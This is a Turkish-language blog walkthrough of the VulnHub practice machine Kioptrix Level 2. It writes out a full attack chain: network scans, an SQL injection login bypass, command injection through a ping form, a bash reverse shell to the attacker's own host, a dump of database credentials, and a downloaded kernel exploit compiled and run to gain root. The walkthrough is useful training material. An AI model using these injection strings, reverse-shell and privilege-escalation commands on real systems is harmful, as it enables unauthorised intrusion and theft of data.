Sızma Testi Örnekleri Kioptrix Level 2

Sızma Testi Örnekleri:Kioptrix Level 2

Kioptrix serisinin ikinci yazısında ilk makine kadar kolay olmasa da kolay sayılabilecek level 2 makinesinin çözümünü anlatacağım. Bu makinenin çözümü ilkine göre daha zevkli ve öğretici.

Kioptrix level 2 indirme bağlantısı : https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

Herzaman ki gibi işe makinenin ip adresinin bulmakla başlayalım.Bunun için netdiscover kullanacağım.

netdiscover -r 172.20.0.0/16

Nmap taraması ile hangi portların açık olduğuna bir bakalım.

nmap -sS -sV -p- 172.20.10.2 -n

İlk önce web uygulamasına bakalım.Karşımıza böyle bir giriş ekranı çıkacak.

Birkaç giriş (admin-admin, admin-root) denemem işe yaramadı.sonra sql injection varmı diye kontrol ettim ve giriş yapmayı başardım.

‘or’kb’=’kb

Karşımıza böyle bir ekran çıktı ve bize ping atılacak makineyi soruyor.Böyle şartlarda code execution aramak gerekir.

;ls

Code execution olduğu aşikar 🙂 beni pingit.php ye yönlendirdi ve dizindeki dosyaları listeledi.

Madem codex var o zaman reverse shell alalım ne duruyoruz.Ping atma inputuna şu komutçuğu girerek kendi makinemize (172.20.10.4) 7777.porttan istek atıyoruz Ve bu sırada nc ile bu portu dinliyoruz.

; bash -i >& /dev/tcp/172.20.10.4/7777 0>&1

nc -lvp 7777

Gördüğünüz gibi shell almayı başardık.Şimdi sıra hak yükseltmede.Bunun için bulunduğum dizine bir bakıyorum Ve index.php olduğunu görüp cat ile içine bakıyorum.İçinde bizim için önemli olabilecek bir bilgi var.Mysql bağlantısı yaptığı kullanıcı adı ve şifresi.

Aynı şekilde bu bilgilerin sistem kullanıcı adı ve parolası olabileceğini düşünüp deniyorum.Tabi işe yaramadı.

Bu bilgilerle mysql e bağlanıp kritik bilgilerin olup olmadığına bakalım.

mysql -u john -p
show databases;

webapp veritabanına girip kullanıcılara bakalım.

use webapp;
show tables;
select * from users;

Bu bilgileri ssh bağlantısı yapıp kullandım fakat işe yaramadı.Pekala şimdi hak yükseltmemiz gerek.Root haklarına sahip olmak için gerekli exploit bilgisini çoğu zaman ben exploit suggester dan alıyorum.Exploit suggester ı makineye indirmek için kendi makinemde python ile bağlantı açıyorum ve hedef makineden wget ile suggester ı çekiyorum.

Kendi makinemde ;

python -m “SimpleHTTPServer” 8081

Hedef makinede;

wget 172.20.10.4:8081/les.pl

Exploit suggester ı çalıştırdıktan sonra çıkan exploitler bir işe yaramadı.

Ama çekirdek bilgisini searchsploit de aradıktan sonra işe yarar güzel bir exploit buldum.

searchsploit -w linux kernel 2.6

Exploiti -m parametresi ile bulunduğum dizine kopyalıyorum ve tekrardan bağlantı açıyorum.

searchsploit -m exploits/linux_x86/local/9542.c
python -m “SimpleHTTPServer” 4433

wget ile hedef makineye indirip çalıştırdığımda root haklarına sahip olmuş oluyorum. 🙂

wget 172.20.10.4:4433/9542.c [simterm]
[simterm] gcc 9542.c -o exploit
chmod 755 exploit
./exploit

Sızma Testi Örnekleri:Kioptrix level 1

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir